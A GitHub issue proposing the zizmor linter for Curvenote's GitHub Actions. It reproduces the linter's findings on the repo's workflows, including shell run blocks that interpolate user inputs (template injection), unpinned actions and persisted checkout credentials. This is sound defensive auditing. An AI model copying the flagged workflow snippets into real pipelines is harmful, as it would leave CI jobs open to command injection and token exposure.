Consider using zizmor for linting Actions for common vulnerabilities #48
Description
Some of the Actions provided by Curvenote in this repo are intended to be used by users in their own repositories, for example for drafting, submitting and publishing articles.
In order to harness the security of these actions, I would suggest using zizmor to lint them for common vulnerabilities. Zizmor is a static linter for GitHub Actions, that looks for common vulnerable spots. It runs very fast (written in Rust), it has a very well documented set of rules (with tips on how to fix them), and also automatic fixes for some of them.
A recent success story of Zizmor was how it allowed to discover a vulnerability in the gh-action-pypi-publish action that was patched in v1.13.0.
Zizmor can run in a GitHub Action itself, so PRs in this repo can get automatic reports of possible vulnerabilities. It's also nice to pair the the linting with a Dependabot that regularly checks for updated Actions and automatically opens PRs to update them.
I can share links to the setup we have in one of the Fatiando a Terra repos:
- dependabot.yml: https://github.com/fatiando/choclo/blob/main/.github/dependabot.yml
- Action to run zizmor: https://github.com/fatiando/choclo/blob/main/.github/workflows/actions.yml
Just to illustrate how zizmor would work in this repo, here's the output of zizmor .:
Output of zizmor
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/draft.yml:118:9
|
118 | - uses: actions/checkout@v4
| _________-
119 | | with:
120 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
121 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/draft.yml:150:9
|
150 | - uses: actions/checkout@v4
| _________-
151 | | with:
152 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
153 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/draft.yml:174:9
|
174 | - uses: actions/checkout@v4
| _________-
175 | | with:
176 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
177 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:185:21
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:188:24
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
186 | DEBUG="-d"
187 | fi
188 | if [ -n "${{ inputs.collection }}" ]; then
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:189:42
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
...
188 | if [ -n "${{ inputs.collection }}" ]; then
189 | COLLECTION="--collection ${{ inputs.collection }}"
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:191:31
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
...
190 | fi
191 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/draft.yml:191:59
|
184 | run: |
| ^^^ this run block
185 | if [ "${{ inputs.debug }}" = "true" ]; then
...
190 | fi
191 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:128:9
|
128 | uses: curvenote/actions/strategy@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:154:9
|
154 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:155:9
|
155 | - uses: curvenote/actions/submit@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:178:9
|
178 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:205:9
|
205 | - uses: curvenote/actions/submit-summary@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/draft.yml:210:9
|
210 | uses: curvenote/actions/upsert-comment@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/pr_release.yml:13:9
|
13 | - uses: actions/checkout@v4
| _________-
14 | | with:
15 | | # Fine-grained PAT with contents:write and workflows:write scopes
16 | | token: ${{ secrets.WORKFLOW_TOKEN }}
| |______________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/pr_release.yml:53:9
|
53 | uses: curvenote/actions/upsert-comment@v1
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/publish.yml:116:9
|
116 | - uses: actions/checkout@v4
| _________-
117 | | with:
118 | | ref: ${{ inputs.ref }}
119 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/publish.yml:147:9
|
147 | - uses: actions/checkout@v4
| _________-
148 | | with:
149 | | ref: ${{ inputs.ref }}
150 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/publish.yml:169:9
|
169 | - uses: actions/checkout@v4
| _________-
170 | | with:
171 | | ref: ${{ inputs.ref }}
172 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:179:24
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:180:42
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
180 | COLLECTION="--collection ${{ inputs.collection }}"
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:182:31
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
180 | COLLECTION="--collection ${{ inputs.collection }}"
181 | fi
182 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/publish.yml:182:59
|
178 | - run: |
| ^^^ this run block
179 | if [ -n "${{ inputs.collection }}" ]; then
180 | COLLECTION="--collection ${{ inputs.collection }}"
181 | fi
182 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION
| ^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:126:9
|
126 | uses: curvenote/actions/strategy@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:151:9
|
151 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:152:9
|
152 | - uses: curvenote/actions/submit@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:173:9
|
173 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:194:9
|
194 | - uses: curvenote/actions/submit-summary@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/publish.yml:198:9
|
198 | - uses: curvenote/actions/upsert-comment@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/push.yml:22:9
|
22 | - uses: actions/checkout@v4
| ------------------------- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:30:21
|
29 | run: |
| ^^^ this run block
30 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:40:21
|
39 | run: |
| ^^^ this run block
40 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:50:21
|
49 | run: |
| ^^^ this run block
50 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/push.yml:53:35
|
49 | run: |
| ^^^ this run block
50 | if [ "${{ inputs.debug }}" = "true" ]; then
51 | DEBUG="-d"
52 | fi
53 | curvenote site init ${{ inputs.landing-content }} $DEBUG --set-content
| ^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/push.yml:23:9
|
23 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/release.yml:14:9
|
14 | - uses: actions/checkout@v4
| _________-
15 | | with:
16 | | fetch-depth: 0 # Fetches all tags
| |___________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/release.yml:40:9
|
40 | - uses: actions/checkout@v4
| _________-
41 | | with:
42 | | # Fine-grained PAT with contents:write and workflows:write scopes
43 | | token: ${{ secrets.WORKFLOW_TOKEN }}
| |______________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/release.yml:85:9
|
85 | - uses: actions/checkout@v4
| _________-
86 | | with:
87 | | fetch-depth: 0
88 | | # Fine-grained PAT with contents:write and workflows:write scopes
89 | | token: ${{ secrets.WORKFLOW_TOKEN }}
| |______________________________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:1:1
|
1 | / name: Release
2 | | on:
... |
125 | | run: |
126 | | git push origin --tags --force
| |_________________________________________- default permissions used due to no permissions: block
|
= note: audit confidence → Medium
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:7:3
|
7 | / prepare:
8 | | name: Decide if Versioned Release is Required
... |
33 | | fi
34 | | fi
| | -
| |____________|
| this job
| default permissions used due to no permissions: block
|
= note: audit confidence → Medium
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:35:3
|
35 | / latest:
36 | | name: Create Latest Release
... |
77 | | run: |
78 | | git push origin --tags --force
| | -
| |________________________________________|
| this job
| default permissions used due to no permissions: block
|
= note: audit confidence → Medium
warning[excessive-permissions]: overly broad permissions
--> .github/workflows/release.yml:79:3
|
79 | / release:
80 | | name: Create Versioned Release
... |
125 | | run: |
126 | | git push origin --tags --force
| | -
| |_________________________________________|
| this job
| default permissions used due to no permissions: block
|
= note: audit confidence → Medium
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:23:66
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:24:31
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
24 | echo "Version ${{ steps.get-version.outputs.version }} exists; not releasing"
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:27:23
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
...
26 | else
27 | if [[ ${{ steps.get-version.outputs.version }} =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:28:33
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
...
27 | if [[ ${{ steps.get-version.outputs.version }} =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
28 | echo "Version ${{ steps.get-version.outputs.version }} to be released!"
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:31:33
|
22 | run: |
| --- info: this run block
23 | if git show-ref --tags --verify --quiet "refs/tags/${{ steps.get-version.outputs.version }}"; then
...
30 | else
31 | echo "Version ${{ steps.get-version.outputs.version }} does not match expected pattern (e.g. v1.0.0); not releasing"
| --------------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:97:39
|
96 | run: |
| --- info: this run block
97 | git checkout -b release/${{ needs.prepare.outputs.version }}
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:100:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:101:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
101 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/draft.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:102:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
101 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/draft.yml
102 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/submit.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:103:31
|
99 | run: |
| --- info: this run block
100 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/publish.yml
101 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/draft.yml
102 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/submit.yml
103 | sed -i s/@main/@${{ needs.prepare.outputs.version }}/g .github/workflows/push.yml
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:118:32
|
109 | run: |
| --- info: this run block
110 | git config --global user.name "${GITHUB_ACTOR}"
...
117 | git add -f submit-summary/dist
118 | git commit -m "🚀 ${{ needs.prepare.outputs.version }}"
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:121:23
|
120 | run: |
| --- info: this run block
121 | git tag ${{ needs.prepare.outputs.version }}
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:122:45
|
120 | run: |
| --- info: this run block
121 | git tag ${{ needs.prepare.outputs.version }}
122 | git tag `cut -d "." -f -2 <<< ${{ needs.prepare.outputs.version }}` --force
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
info[template-injection]: code injection via template expansion
--> .github/workflows/release.yml:123:45
|
120 | run: |
| --- info: this run block
121 | git tag ${{ needs.prepare.outputs.version }}
122 | git tag `cut -d "." -f -2 <<< ${{ needs.prepare.outputs.version }}` --force
123 | git tag `cut -d "." -f -1 <<< ${{ needs.prepare.outputs.version }}` --force
| ----------------------------- info: may expand into attacker-controllable code
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/submit.yml:132:9
|
132 | - uses: actions/checkout@v4
| _________-
133 | | with:
134 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
135 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/submit.yml:161:9
|
161 | - uses: actions/checkout@v4
| _________-
162 | | with:
163 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
164 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
warning[artipacked]: credential persistence through GitHub Actions artifacts
--> .github/workflows/submit.yml:194:9
|
194 | - uses: actions/checkout@v4
| _________-
195 | | with:
196 | | ref: ${{ inputs.ref || github.event.pull_request.head.sha }}
197 | | fetch-depth: 1
| |________________________- does not set persist-credentials: false
|
= note: audit confidence → Low
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:171:21
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:174:24
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
172 | DEBUG="-d"
173 | fi
174 | if [ -n "${{ inputs.collection }}" ]; then
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:175:42
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
...
174 | if [ -n "${{ inputs.collection }}" ]; then
175 | COLLECTION="--collection ${{ inputs.collection }}"
| ^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:177:31
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
...
176 | fi
177 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[template-injection]: code injection via template expansion
--> .github/workflows/submit.yml:177:59
|
170 | run: |
| ^^^ this run block
171 | if [ "${{ inputs.debug }}" = "true" ]; then
...
176 | fi
177 | curvenote check ${{ inputs.venue }} --kind "${{ inputs.kind }}" $COLLECTION $DEBUG
| ^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:142:9
|
142 | uses: curvenote/actions/strategy@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:165:9
|
165 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:198:9
|
198 | - uses: curvenote/actions/setup@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:199:9
|
199 | - uses: curvenote/actions/submit@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:221:9
|
221 | - uses: curvenote/actions/submit-summary@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
error[unpinned-uses]: unpinned action reference
--> .github/workflows/submit.yml:226:9
|
226 | uses: curvenote/actions/upsert-comment@main
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ action is not pinned to a hash (required by blanket policy)
|
= note: audit confidence → High
136 findings (66 suppressed, 46 fixable): 0 unknown, 14 informational, 0 low, 18 medium, 38 high